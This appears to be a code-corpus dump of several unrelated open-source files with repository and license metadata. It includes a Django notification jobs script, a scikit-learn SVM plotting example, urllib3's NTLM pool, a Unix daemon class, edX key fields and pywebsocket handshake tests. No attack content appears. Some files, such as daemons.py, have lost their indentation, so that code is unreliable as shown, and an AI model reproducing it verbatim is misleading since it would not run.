        email.send()
        print msg
def do_watchdog_notstartedpdfprocess():
    """Warn the site admins when PDF jobs submitted >20 minutes ago have
    still not started processing.
    """
    minutes_ago = datetime.datetime.now() - datetime.timedelta(0, 20*60) # 20 minutes ago
    objs = M.Processqueue.objects.filter(started__isnull=True, submitted__lt=minutes_ago)
    #rows = DB.getRows("select p.id_source, s.title, now()-p.submitted from nb2_processqueue p left join source s on s.id=p.id_source where now()-p.submitted>'60 minutes' and p.started is null", ());
    if objs.count() > 0:
        V = {"objs": objs, "hostname": settings.HOSTNAME }
        msg = render_to_string("email/msg_watchdog_notstartedpdf",V)
        recipients = [i[1] for i in settings.ADMINS]
        email = EmailMessage("NB Watchdog warning: some pdf processes haven't started yet",
                             msg,
                             settings.EMAIL_WATCHDOG,
                             recipients,
                             (settings.EMAIL_BCC, ))
        email.send()
        print msg
def do_auth_digest():
    """Digest variant of the author-confirmation email.

    NOTE(review): dead legacy code.  It references names not defined in
    this module (``DB``, ``smtplib``, ``CC_ME``, ``CC_EMAIL`` and the
    ``MSG_AUTH_DIGEST_*`` templates) and old ``nb2_*`` table names, so it
    would raise NameError if called.  It is also disabled in ``do_digest``.
    """
    latestCtime = DB.getVal("select max(ctime) from nb2_comment", ());
    rows = DB.getRows("""
select v.id, v.id_location, v.id_author, v.email, v.id_type, v.title, v.body, v.ctime, e.name, us.value as user_setting, ds.value as default_setting
from nb2_v_comment v left join nb2_user_settings us on id_author=us.id_user and us.name='email_confirmation_author' and us.valid=1, ensemble e, nb2_default_settings ds
where
e.id= v.id_ensemble and
v.ctime > (select atime from nb2_latest_notifications where type='auth_digest')
and ds.name='email_confirmation_author'
and ( us.value = 1 or (us.value is null and ds.value=1))
order by v.ctime""", ())
    msg_by_email = {}
    # Group the raw rows into one bucket per recipient email address.
    for r2 in rows:
        i=1
        V={"reply_to": settings.SMTP_REPLY_TO, "protocol": settings.PROTOCOL, "hostname": settings.HOSTNAME }
        V["id_location"] = r2[i];i+=1
        V["id_author"] = r2[i];i+=1
        V["email"] = r2[i];i+=1
        #V["visibility"];
        i+=1
        V["file"] = r2[i];i+=1
        V["body"] = r2[i];i+=1
        V["ctime"]= r2[i];i+=1
        V["ensemble"] = r2[i];i+=1
        if V["email"] not in msg_by_email:
            msg_by_email[V["email"]]=[]
        msg_by_email[V["email"]].append(V)
    DB.doTransaction("update nb2_latest_notifications set atime = ? where type='auth_digest'", (latestCtime,))
    # One digest email per recipient: header + one body section per note.
    for email in msg_by_email:
        vals = msg_by_email[email]
        msg = MSG_AUTH_DIGEST_HEADER % vals[0]
        for V in vals:
            msg+=MSG_AUTH_DIGEST_BODY % V
        msg+=MSG_AUTH_DIGEST_FOOTER
        if settings.DO_EMAIL:
            session = smtplib.SMTP(settings.SMTP_SERVER)
            recipients = [email]
            if CC_ME:
                recipients.append(CC_EMAIL)
            smtpresult = session.sendmail(settings.SMTP_USER, recipients, msg)
        try:
            print msg
        except UnicodeEncodeError:
            print "not displaying msg b/c of unicode issues"
def do_reply_digest():
    """Digest variant of the reply notification email.

    NOTE(review): dead legacy code, like ``do_auth_digest`` -- it uses the
    undefined ``DB``, ``smtplib``, ``CC_ME``/``CC_EMAIL`` and
    ``MSG_REPLY_DIGEST_*`` names plus old ``nb2_*`` tables, and is
    disabled in ``do_digest``.
    """
    latestCtime = DB.getVal("select max(ctime) from nb2_comment", ());
    rows = DB.getRows("""
select v.id_location, v.email, i.title, i.body, i.ctime
from nb2_v_comment v left join nb2_user_settings us on v.id_author=us.id_user and us.name='email_confirmation_reply_author' and us.valid=1,nb2_v_digest_class i, nb2_default_settings ds
where v.id_location = i.id_location and
v.id_author != i.id_author and
ds.name='email_confirmation_reply_author' and
( us.value = 1 or (us.value is null and ds.value=1))""", ())
    msg_by_email = {}
    # Group the raw rows into one bucket per recipient email address.
    for r2 in rows:
        i=0
        V={"reply_to": settings.SMTP_REPLY_TO, "protocol": settings.PROTOCOL, "hostname": settings.HOSTNAME }
        V["id_location"] = r2[i];i+=1
        V["email"] = r2[i];i+=1
        V["file"] = r2[i];i+=1
        V["body"] = r2[i];i+=1
        V["ctime"]= r2[i];i+=1
        if V["email"] not in msg_by_email:
            msg_by_email[V["email"]]=[]
        msg_by_email[V["email"]].append(V)
    DB.doTransaction("update nb2_latest_notifications set atime = ? where type='reply_digest'", (latestCtime,))
    # One digest email per recipient, one body section per thread location.
    for email in msg_by_email:
        locations = []
        vals = msg_by_email[email]
        msg = MSG_REPLY_DIGEST_HEADER % vals[0]
        for V in vals:
            if V["id_location"] not in locations:
                locations.append(V["id_location"])
                msg+=MSG_REPLY_DIGEST_BODY % V
        msg+=MSG_REPLY_DIGEST_FOOTER
        if settings.DO_EMAIL:
            session = smtplib.SMTP(settings.SMTP_SERVER)
            recipients = [email]
            if CC_ME:
                recipients.append(CC_EMAIL)
            smtpresult = session.sendmail(settings.SMTP_USER, recipients, msg)
        try:
            print msg
        except UnicodeEncodeError:
            print "not displaying msg b/c of unicode issues"
def do_upgrade(t_args):
    """Entry point for one-off data upgrades.

    Currently always triggers the salted-password upgrade; the commented
    guard shows the intended "only when needed" check.
    """
    # We will see if we need to upgrade and call
    # the appropriate upgrade methods when needed
    #u = M.User.objects.all()[0]
    #if u.password != None and u.saltedhash == None:
    do_auth_salt_upgrade()
@transaction.commit_on_success
def do_auth_salt_upgrade():
    """Populate ``salt``/``saltedhash`` for users that still only have a
    plaintext ``password``; runs inside a single transaction.
    """
    # This method does not handle database migrations, only schema
    # upgrades. Make sure to run the following query before doing
    # upgrade:
    #
    # ALTER TABLE base_user
    #  ADD COLUMN salt varchar(32),
    #  ADD COLUMN saltedhash varchar(128);
    #
    # The query can be run from manage.py dbshell
    usercount = 0
    print "begin update..."
    for u in M.User.objects.filter(salt=None):
        if usercount >0 and usercount%100 == 0:
            print "updated a chunk of 100 users..."
        usercount+=1
        if u.password != None and u.saltedhash == None:
            u.set_password(u.password)
            # we will unset the password manually later
            # u.password = None
            u.save()
    print "update done: success"
# CLI dispatch: utils.process_cli picks the handler named by the first
# command-line argument (e.g. ``python jobs.py immediate``).
if __name__ == "__main__" :
    ACTIONS = {
        "immediate": do_immediate,
        "digest": do_digest,
        "watchdog": do_watchdog,
        "extract": do_extract,
        "dumpensemble": do_dumpensemble,
        "upgrade": do_upgrade
    }
    utils.process_cli(__file__, ACTIONS)
| mit |
dhruv13J/scikit-learn | examples/svm/plot_iris.py | 62 | 3251 | """
==================================================
Plot different SVM classifiers in the iris dataset
==================================================
Comparison of different linear SVM classifiers on a 2D projection of the iris
dataset. We only consider the first 2 features of this dataset:
- Sepal length
- Sepal width
This example shows how to plot the decision surface for four SVM classifiers
with different kernels.
The linear models ``LinearSVC()`` and ``SVC(kernel='linear')`` yield slightly
different decision boundaries. This can be a consequence of the following
differences:
- ``LinearSVC`` minimizes the squared hinge loss while ``SVC`` minimizes the
regular hinge loss.
- ``LinearSVC`` uses the One-vs-All (also known as One-vs-Rest) multiclass
reduction while ``SVC`` uses the One-vs-One multiclass reduction.
Both linear models have linear decision boundaries (intersecting hyperplanes)
while the non-linear kernel models (polynomial or Gaussian RBF) have more
flexible non-linear decision boundaries with shapes that depend on the kind of
kernel and its parameters.
.. NOTE:: while plotting the decision function of classifiers for toy 2D
   datasets can help get an intuitive understanding of their respective
   expressive power, be aware that those intuitions don't always generalize
   to more realistic high-dimensional problems.
"""
print(__doc__)

import numpy as np
import matplotlib.pyplot as plt
from sklearn import svm, datasets

# import some data to play with
iris = datasets.load_iris()
X = iris.data[:, :2]  # we only take the first two features. We could
                      # avoid this ugly slicing by using a two-dim dataset
y = iris.target
h = .02  # step size in the mesh

# we create an instance of SVM and fit our data. We do not scale our
# data since we want to plot the support vectors
C = 1.0  # SVM regularization parameter
svc = svm.SVC(kernel='linear', C=C).fit(X, y)
rbf_svc = svm.SVC(kernel='rbf', gamma=0.7, C=C).fit(X, y)
poly_svc = svm.SVC(kernel='poly', degree=3, C=C).fit(X, y)
lin_svc = svm.LinearSVC(C=C).fit(X, y)

# create a mesh to plot in
x_min, x_max = X[:, 0].min() - 1, X[:, 0].max() + 1
y_min, y_max = X[:, 1].min() - 1, X[:, 1].max() + 1
xx, yy = np.meshgrid(np.arange(x_min, x_max, h),
                     np.arange(y_min, y_max, h))

# title for the plots
titles = ['SVC with linear kernel',
          'LinearSVC (linear kernel)',
          'SVC with RBF kernel',
          'SVC with polynomial (degree 3) kernel']

for i, clf in enumerate((svc, lin_svc, rbf_svc, poly_svc)):
    # Plot the decision boundary. For that, we will assign a color to each
    # point in the mesh [x_min, x_max]x[y_min, y_max].
    plt.subplot(2, 2, i + 1)
    plt.subplots_adjust(wspace=0.4, hspace=0.4)

    Z = clf.predict(np.c_[xx.ravel(), yy.ravel()])

    # Put the result into a color plot
    Z = Z.reshape(xx.shape)
    plt.contourf(xx, yy, Z, cmap=plt.cm.Paired, alpha=0.8)

    # Plot also the training points
    plt.scatter(X[:, 0], X[:, 1], c=y, cmap=plt.cm.Paired)
    plt.xlabel('Sepal length')
    plt.ylabel('Sepal width')
    plt.xlim(xx.min(), xx.max())
    plt.ylim(yy.min(), yy.max())
    plt.xticks(())
    plt.yticks(())
    plt.title(titles[i])

plt.show()
| bsd-3-clause |
JoaoVasques/aws-devtool | eb/macosx/python3/lib/aws/requests/packages/urllib3/contrib/ntlmpool.py | 262 | 4740 | # urllib3/contrib/ntlmpool.py
# Copyright 2008-2012 Andrey Petrov and contributors (see CONTRIBUTORS.txt)
#
# This module is part of urllib3 and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
"""
NTLM authenticating pool, contributed by erikcederstran
Issue #10, see: http://code.google.com/p/urllib3/issues/detail?id=10
"""
try:
from http.client import HTTPSConnection
except ImportError:
from httplib import HTTPSConnection
from logging import getLogger
from ntlm import ntlm
from urllib3 import HTTPSConnectionPool
log = getLogger(__name__)
class NTLMConnectionPool(HTTPSConnectionPool):
    """
    Implements an NTLM authentication version of an urllib3 connection pool.

    The NTLM handshake is performed once per socket in _new_conn(); the
    authenticated socket must then stay open for subsequent requests, which
    is why urlopen() forces 'Connection: Keep-Alive'.
    """

    scheme = 'https'

    def __init__(self, user, pw, authurl, *args, **kwargs):
        """
        authurl is a random URL on the server that is protected by NTLM.
        user is the Windows user, probably in the DOMAIN\\username format.
        pw is the password for the user.
        """
        super(NTLMConnectionPool, self).__init__(*args, **kwargs)
        self.authurl = authurl
        self.rawuser = user
        # Split 'DOMAIN\\user' into its two halves; the domain is upper-cased
        # as required by the NTLM protocol.
        user_parts = user.split('\\', 1)
        self.domain = user_parts[0].upper()
        self.user = user_parts[1]
        self.pw = pw

    def _new_conn(self):
        # Performs the NTLM handshake that secures the connection. The socket
        # must be kept open while requests are performed.
        self.num_connections += 1
        log.debug('Starting NTLM HTTPS connection no. %d: https://%s%s' %
                  (self.num_connections, self.host, self.authurl))

        headers = {}
        headers['Connection'] = 'Keep-Alive'
        req_header = 'Authorization'
        resp_header = 'www-authenticate'

        conn = HTTPSConnection(host=self.host, port=self.port)

        # Send negotiation message
        headers[req_header] = (
            'NTLM %s' % ntlm.create_NTLM_NEGOTIATE_MESSAGE(self.rawuser))
        log.debug('Request headers: %s' % headers)
        conn.request('GET', self.authurl, None, headers)
        res = conn.getresponse()
        # BUG FIX: Python 3's http.client preserves the server's header
        # casing (typically 'WWW-Authenticate'), while Python 2's httplib
        # lowercased header names. Lower-case the keys explicitly so the
        # 'www-authenticate' lookup below works on both.
        reshdr = dict((k.lower(), v) for k, v in res.getheaders())
        log.debug('Response status: %s %s' % (res.status, res.reason))
        log.debug('Response headers: %s' % reshdr)
        log.debug('Response data: %s [...]' % res.read(100))

        # Remove the reference to the socket, so that it can not be closed by
        # the response object (we want to keep the socket open)
        res.fp = None

        # Server should respond with a challenge message
        auth_header_values = reshdr[resp_header].split(', ')
        auth_header_value = None
        for s in auth_header_values:
            if s[:5] == 'NTLM ':
                auth_header_value = s[5:]
        if auth_header_value is None:
            raise Exception('Unexpected %s response header: %s' %
                            (resp_header, reshdr[resp_header]))

        # Send authentication message
        ServerChallenge, NegotiateFlags = \
            ntlm.parse_NTLM_CHALLENGE_MESSAGE(auth_header_value)
        auth_msg = ntlm.create_NTLM_AUTHENTICATE_MESSAGE(ServerChallenge,
                                                         self.user,
                                                         self.domain,
                                                         self.pw,
                                                         NegotiateFlags)
        headers[req_header] = 'NTLM %s' % auth_msg
        log.debug('Request headers: %s' % headers)
        conn.request('GET', self.authurl, None, headers)
        res = conn.getresponse()
        log.debug('Response status: %s %s' % (res.status, res.reason))
        log.debug('Response headers: %s' % dict(res.getheaders()))
        log.debug('Response data: %s [...]' % res.read()[:100])
        if res.status != 200:
            if res.status == 401:
                raise Exception('Server rejected request: wrong '
                                'username or password')
            raise Exception('Wrong server response: %s %s' %
                            (res.status, res.reason))

        # Again detach the socket from the response so it stays open.
        res.fp = None
        log.debug('Connection established')
        return conn

    def urlopen(self, method, url, body=None, headers=None, retries=3,
                redirect=True, assert_same_host=True):
        # Force keep-alive on every request: the NTLM authentication is bound
        # to the underlying socket, so closing it would drop the session.
        if headers is None:
            headers = {}
        headers['Connection'] = 'Keep-Alive'
        return super(NTLMConnectionPool, self).urlopen(method, url, body,
                                                       headers, retries,
                                                       redirect,
                                                       assert_same_host)
| apache-2.0 |
clearcode/Apache2Piwik | src/daemons.py | 1 | 2900 | #-*- coding: utf-8 -*-
#!/usr/bin/env python
import sys, os, time, atexit
from signal import SIGTERM
from datetime import datetime
class Daemon:
"""
A generic daemon class.
Usage: subclass the Daemon class and override the run() method
"""
def __init__(self, pidfile, stdin='/dev/null', stdout='/dev/null', stderr='/dev/null'):
self.stdin = stdin
self.stdout = stdout
self.stderr = stderr
self.pidfile = pidfile
def daemonize(self):
"""
do the UNIX double-fork magic, see Stevens' "Advanced
Programming in the UNIX Environment" for details (ISBN 0201563177)
http://www.erlenstar.demon.co.uk/unix/faq_2.html#SEC16
"""
try:
pid = os.fork()
if pid > 0:
# exit first parent
sys.exit(0)
except OSError, e:
sys.stderr.write("fork #1 failed: %d (%s)\n" % (e.errno, e.strerror))
sys.exit(1)
# decouple from parent environment
os.chdir("/")
os.setsid()
os.umask(0)
# do second fork
try:
pid = os.fork()
if pid > 0:
# exit from second parent
sys.exit(0)
except OSError, e:
sys.stderr.write("fork #2 failed: %d (%s)\n" % (e.errno, e.strerror))
sys.exit(1)
# redirect standard file descriptors
sys.stdout.flush()
sys.stderr.flush()
si = file(self.stdin, 'r')
so = file(self.stdout, 'a+')
se = file(self.stderr, 'a+', 0)
os.dup2(si.fileno(), sys.stdin.fileno())
#os.dup2(so.fileno(), sys.stdout.fileno())
os.dup2(se.fileno(), sys.stderr.fileno())
# write pidfile
atexit.register(self.delpid)
pid = str(os.getpid())
f = open(self.pidfile,'w+')
f.write("%s\n" % pid)
def delpid(self):
os.remove(self.pidfile)
def start(self,d):
"""
Start the daemon
"""
# Check for a pidfile to see if the daemon already runs
try:
pf = file(self.pidfile,'r')
pid = int(pf.read().strip())
pf.close()
except IOError:
pid = None
if pid:
message = "pidfile %s already exist. Daemon already running?\n"
sys.stderr.write(message % self.pidfile)
sys.exit(1)
# Start the daemon
self.daemonize()
self.run(d)
def stop(self):
"""
Stop the daemon
"""
# Get the pid from the pidfile
try:
pf = file(self.pidfile,'r')
pid = int(pf.read().strip())
pf.close()
except IOError:
pid = None
if not pid:
message = "pidfile %s does not exist. Daemon not running?\n"
sys.stderr.write(message % self.pidfile)
return # not an error in a restart
# Try killing the daemon process
try:
while 1:
os.kill(pid, SIGTERM)
time.sleep(0.1)
except OSError, err:
err = str(err)
if err.find("No such process") > 0:
if os.path.exists(self.pidfile):
os.remove(self.pidfile)
else:
print str(err)
sys.exit(1)
def run(self,d):
"""
You should override this method when you subclass Daemon. It will be called after the process has been
daemonized by start() or restart().
"""
| gpl-3.0 |
waheedahmed/edx-platform | common/lib/xmodule/xmodule/modulestore/mongoengine_fields.py | 209 | 3190 | """
Custom field types for mongoengine
"""
import mongoengine
from opaque_keys.edx.locations import SlashSeparatedCourseKey, Location
from types import NoneType
from opaque_keys.edx.keys import CourseKey, UsageKey
class CourseKeyField(mongoengine.StringField):
    """
    Mongoengine field that stores a CourseKey as its deprecated string form
    and turns it back into a CourseKey on the way out.
    """

    def __init__(self, **kwargs):
        # it'd be useful to add init args such as support_deprecated, force_deprecated
        super(CourseKeyField, self).__init__(**kwargs)

    def to_mongo(self, course_key):
        """Serialize to the deprecated string form (None stays None)."""
        assert isinstance(course_key, (NoneType, CourseKey))
        if not course_key:
            return None
        # don't call super as base.BaseField.to_mongo calls to_python() for some odd reason
        return course_key.to_deprecated_string()

    def to_python(self, course_key):
        """Deserialize a stored value into a CourseKey instance (or None)."""
        # calling super b/c it decodes utf (and doesn't have circularity of from_python)
        decoded = super(CourseKeyField, self).to_python(course_key)
        assert isinstance(decoded, (NoneType, basestring, CourseKey))
        if decoded == '':
            return None
        if not isinstance(decoded, basestring):
            return decoded
        return SlashSeparatedCourseKey.from_deprecated_string(decoded)

    def validate(self, value):
        """Validate the string form of the key via the parent StringField."""
        assert isinstance(value, (NoneType, basestring, CourseKey))
        serialized = value.to_deprecated_string() if isinstance(value, CourseKey) else value
        return super(CourseKeyField, self).validate(serialized)

    def prepare_query_value(self, _opt, value):
        # Queries compare against the serialized (deprecated string) form.
        return self.to_mongo(value)
class UsageKeyField(mongoengine.StringField):
    """
    Mongoengine field that stores a UsageKey as a single string (the
    deprecated i4x/c4x form) and rebuilds the key when reading.
    """

    def to_mongo(self, location):
        """Serialize to the deprecated i4x/c4x string form (None stays None)."""
        assert isinstance(location, (NoneType, UsageKey))
        return None if location is None else super(
            UsageKeyField, self).to_mongo(location.to_deprecated_string())

    def to_python(self, location):
        """Deserialize to a UsageKey instance: a Location missing the run (or None)."""
        assert isinstance(location, (NoneType, basestring, UsageKey))
        if location == '':
            return None
        if not isinstance(location, basestring):
            return location
        decoded = super(UsageKeyField, self).to_python(location)
        return Location.from_deprecated_string(decoded)

    def validate(self, value):
        """Validate the string form of the key via the parent StringField."""
        assert isinstance(value, (NoneType, basestring, UsageKey))
        serialized = value.to_deprecated_string() if isinstance(value, UsageKey) else value
        return super(UsageKeyField, self).validate(serialized)

    def prepare_query_value(self, _opt, value):
        # Queries compare against the serialized (deprecated string) form.
        return self.to_mongo(value)
| agpl-3.0 |
xin3liang/platform_external_chromium-trace | trace-viewer/third_party/pywebsocket/src/test/test_handshake_hybi00.py | 30 | 15038 | #!/usr/bin/env python
#
# Copyright 2011, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Tests for handshake.hybi00 module."""
import unittest
import set_sys_path # Update sys.path to locate mod_pywebsocket module.
from mod_pywebsocket.handshake._base import HandshakeException
from mod_pywebsocket.handshake import hybi00 as handshake
from test import mock
_GOOD_REQUEST = (
80,
'GET',
'/demo',
{
'Host': 'example.com',
'Connection': 'Upgrade',
'Sec-WebSocket-Key2': '12998 5 Y3 1 .P00',
'Sec-WebSocket-Protocol': 'sample',
'Upgrade': 'WebSocket',
'Sec-WebSocket-Key1': '4 @1 46546xW%0l 1 5',
'Origin': 'http://example.com',
},
'^n:ds[4U')
_GOOD_REQUEST_CAPITALIZED_HEADER_VALUES = (
80,
'GET',
'/demo',
{
'Host': 'example.com',
'Connection': 'UPGRADE',
'Sec-WebSocket-Key2': '12998 5 Y3 1 .P00',
'Sec-WebSocket-Protocol': 'sample',
'Upgrade': 'WEBSOCKET',
'Sec-WebSocket-Key1': '4 @1 46546xW%0l 1 5',
'Origin': 'http://example.com',
},
'^n:ds[4U')
_GOOD_RESPONSE_DEFAULT_PORT = (
'HTTP/1.1 101 WebSocket Protocol Handshake\r\n'
'Upgrade: WebSocket\r\n'
'Connection: Upgrade\r\n'
'Sec-WebSocket-Location: ws://example.com/demo\r\n'
'Sec-WebSocket-Origin: http://example.com\r\n'
'Sec-WebSocket-Protocol: sample\r\n'
'\r\n'
'8jKS\'y:G*Co,Wxa-')
_GOOD_RESPONSE_SECURE = (
'HTTP/1.1 101 WebSocket Protocol Handshake\r\n'
'Upgrade: WebSocket\r\n'
'Connection: Upgrade\r\n'
'Sec-WebSocket-Location: wss://example.com/demo\r\n'
'Sec-WebSocket-Origin: http://example.com\r\n'
'Sec-WebSocket-Protocol: sample\r\n'
'\r\n'
'8jKS\'y:G*Co,Wxa-')
_GOOD_REQUEST_NONDEFAULT_PORT = (
8081,
'GET',
'/demo',
{
'Host': 'example.com:8081',
'Connection': 'Upgrade',
'Sec-WebSocket-Key2': '12998 5 Y3 1 .P00',
'Sec-WebSocket-Protocol': 'sample',
'Upgrade': 'WebSocket',
'Sec-WebSocket-Key1': '4 @1 46546xW%0l 1 5',
'Origin': 'http://example.com',
},
'^n:ds[4U')
_GOOD_RESPONSE_NONDEFAULT_PORT = (
'HTTP/1.1 101 WebSocket Protocol Handshake\r\n'
'Upgrade: WebSocket\r\n'
'Connection: Upgrade\r\n'
'Sec-WebSocket-Location: ws://example.com:8081/demo\r\n'
'Sec-WebSocket-Origin: http://example.com\r\n'
'Sec-WebSocket-Protocol: sample\r\n'
'\r\n'
'8jKS\'y:G*Co,Wxa-')
_GOOD_RESPONSE_SECURE_NONDEF = (
'HTTP/1.1 101 WebSocket Protocol Handshake\r\n'
'Upgrade: WebSocket\r\n'
'Connection: Upgrade\r\n'
'Sec-WebSocket-Location: wss://example.com:8081/demo\r\n'
'Sec-WebSocket-Origin: http://example.com\r\n'
'Sec-WebSocket-Protocol: sample\r\n'
'\r\n'
'8jKS\'y:G*Co,Wxa-')
_GOOD_REQUEST_NO_PROTOCOL = (
80,
'GET',
'/demo',
{
'Host': 'example.com',
'Connection': 'Upgrade',
'Sec-WebSocket-Key2': '12998 5 Y3 1 .P00',
'Upgrade': 'WebSocket',
'Sec-WebSocket-Key1': '4 @1 46546xW%0l 1 5',
'Origin': 'http://example.com',
},
'^n:ds[4U')
_GOOD_RESPONSE_NO_PROTOCOL = (
'HTTP/1.1 101 WebSocket Protocol Handshake\r\n'
'Upgrade: WebSocket\r\n'
'Connection: Upgrade\r\n'
'Sec-WebSocket-Location: ws://example.com/demo\r\n'
'Sec-WebSocket-Origin: http://example.com\r\n'
'\r\n'
'8jKS\'y:G*Co,Wxa-')
_GOOD_REQUEST_WITH_OPTIONAL_HEADERS = (
80,
'GET',
'/demo',
{
'Host': 'example.com',
'Connection': 'Upgrade',
'Sec-WebSocket-Key2': '12998 5 Y3 1 .P00',
'EmptyValue': '',
'Sec-WebSocket-Protocol': 'sample',
'AKey': 'AValue',
'Upgrade': 'WebSocket',
'Sec-WebSocket-Key1': '4 @1 46546xW%0l 1 5',
'Origin': 'http://example.com',
},
'^n:ds[4U')
# TODO(tyoshino): Include \r \n in key3, challenge response.
_GOOD_REQUEST_WITH_NONPRINTABLE_KEY = (
80,
'GET',
'/demo',
{
'Host': 'example.com',
'Connection': 'Upgrade',
'Sec-WebSocket-Key2': 'y R2 48 Q1O4 e|BV3 i5 1 u- 65',
'Sec-WebSocket-Protocol': 'sample',
'Upgrade': 'WebSocket',
'Sec-WebSocket-Key1': '36 7 74 i 92 2\'m 9 0G',
'Origin': 'http://example.com',
},
''.join(map(chr, [0x01, 0xd1, 0xdd, 0x3b, 0xd1, 0x56, 0x63, 0xff])))
_GOOD_RESPONSE_WITH_NONPRINTABLE_KEY = (
'HTTP/1.1 101 WebSocket Protocol Handshake\r\n'
'Upgrade: WebSocket\r\n'
'Connection: Upgrade\r\n'
'Sec-WebSocket-Location: ws://example.com/demo\r\n'
'Sec-WebSocket-Origin: http://example.com\r\n'
'Sec-WebSocket-Protocol: sample\r\n'
'\r\n' +
''.join(map(chr, [0x0b, 0x99, 0xfa, 0x55, 0xbd, 0x01, 0x23, 0x7b,
0x45, 0xa2, 0xf1, 0xd0, 0x87, 0x8a, 0xee, 0xeb])))
_BAD_REQUESTS = (
( # HTTP request
80,
'GET',
'/demo',
{
'Host': 'www.google.com',
'User-Agent': 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5;'
' en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3'
' GTB6 GTBA',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,'
'*/*;q=0.8',
'Accept-Language': 'en-us,en;q=0.5',
'Accept-Encoding': 'gzip,deflate',
'Accept-Charset': 'ISO-8859-1,utf-8;q=0.7,*;q=0.7',
'Keep-Alive': '300',
'Connection': 'keep-alive',
}),
( # Wrong method
80,
'POST',
'/demo',
{
'Host': 'example.com',
'Connection': 'Upgrade',
'Sec-WebSocket-Key2': '12998 5 Y3 1 .P00',
'Sec-WebSocket-Protocol': 'sample',
'Upgrade': 'WebSocket',
'Sec-WebSocket-Key1': '4 @1 46546xW%0l 1 5',
'Origin': 'http://example.com',
},
'^n:ds[4U'),
( # Missing Upgrade
80,
'GET',
'/demo',
{
'Host': 'example.com',
'Connection': 'Upgrade',
'Sec-WebSocket-Key2': '12998 5 Y3 1 .P00',
'Sec-WebSocket-Protocol': 'sample',
'Sec-WebSocket-Key1': '4 @1 46546xW%0l 1 5',
'Origin': 'http://example.com',
},
'^n:ds[4U'),
( # Wrong Upgrade
80,
'GET',
'/demo',
{
'Host': 'example.com',
'Connection': 'Upgrade',
'Sec-WebSocket-Key2': '12998 5 Y3 1 .P00',
'Sec-WebSocket-Protocol': 'sample',
'Upgrade': 'NonWebSocket',
'Sec-WebSocket-Key1': '4 @1 46546xW%0l 1 5',
'Origin': 'http://example.com',
},
'^n:ds[4U'),
( # Empty WebSocket-Protocol
80,
'GET',
'/demo',
{
'Host': 'example.com',
'Connection': 'Upgrade',
'Sec-WebSocket-Key2': '12998 5 Y3 1 .P00',
'Sec-WebSocket-Protocol': '',
'Upgrade': 'WebSocket',
'Sec-WebSocket-Key1': '4 @1 46546xW%0l 1 5',
'Origin': 'http://example.com',
},
'^n:ds[4U'),
( # Wrong port number format
80,
'GET',
'/demo',
{
'Host': 'example.com:0x50',
'Connection': 'Upgrade',
'Sec-WebSocket-Key2': '12998 5 Y3 1 .P00',
'Sec-WebSocket-Protocol': 'sample',
'Upgrade': 'WebSocket',
'Sec-WebSocket-Key1': '4 @1 46546xW%0l 1 5',
'Origin': 'http://example.com',
},
'^n:ds[4U'),
( # Header/connection port mismatch
8080,
'GET',
'/demo',
{
'Host': 'example.com',
'Connection': 'Upgrade',
'Sec-WebSocket-Key2': '12998 5 Y3 1 .P00',
'Sec-WebSocket-Protocol': 'sample',
'Upgrade': 'WebSocket',
'Sec-WebSocket-Key1': '4 @1 46546xW%0l 1 5',
'Origin': 'http://example.com',
},
'^n:ds[4U'),
( # Illegal WebSocket-Protocol
80,
'GET',
'/demo',
{
'Host': 'example.com',
'Connection': 'Upgrade',
'Sec-WebSocket-Key2': '12998 5 Y3 1 .P00',
'Sec-WebSocket-Protocol': 'illegal\x09protocol',
'Upgrade': 'WebSocket',
'Sec-WebSocket-Key1': '4 @1 46546xW%0l 1 5',
'Origin': 'http://example.com',
},
'^n:ds[4U'),
)
def _create_request(request_def):
    """Build a MockRequest from a (port, method, uri, headers[, body]) tuple."""
    port, method, uri, headers = request_def[:4]
    payload = request_def[4] if len(request_def) > 4 else ''
    connection = mock.MockConn(payload)
    connection.local_addr = ('0.0.0.0', port)
    return mock.MockRequest(
        method=method,
        uri=uri,
        headers_in=headers,
        connection=connection)
def _create_get_memorized_lines(lines):
"""Creates a function that returns the given string."""
def get_memorized_lines():
return lines
return get_memorized_lines
def _create_requests_with_lines(request_lines_set):
    """Build one good mock request per entry, each memorizing its lines."""
    def _build(lines):
        request = _create_request(_GOOD_REQUEST)
        request.connection.get_memorized_lines = _create_get_memorized_lines(
            lines)
        return request
    return [_build(lines) for lines in request_lines_set]
class Hybi00HandshakerTest(unittest.TestCase):
    """Tests for the hybi-00 (draft-76) opening-handshake implementation.

    Each test feeds a canned request tuple through handshake.Handshaker and
    compares the bytes written to the mock connection against the matching
    canned response defined at module level.
    """

    def test_good_request_default_port(self):
        # A well-formed request on port 80 must yield the default-port
        # response and populate every ws_* attribute on the request.
        request = _create_request(_GOOD_REQUEST)
        handshaker = handshake.Handshaker(request,
                                          mock.MockDispatcher())
        handshaker.do_handshake()
        self.assertEqual(_GOOD_RESPONSE_DEFAULT_PORT,
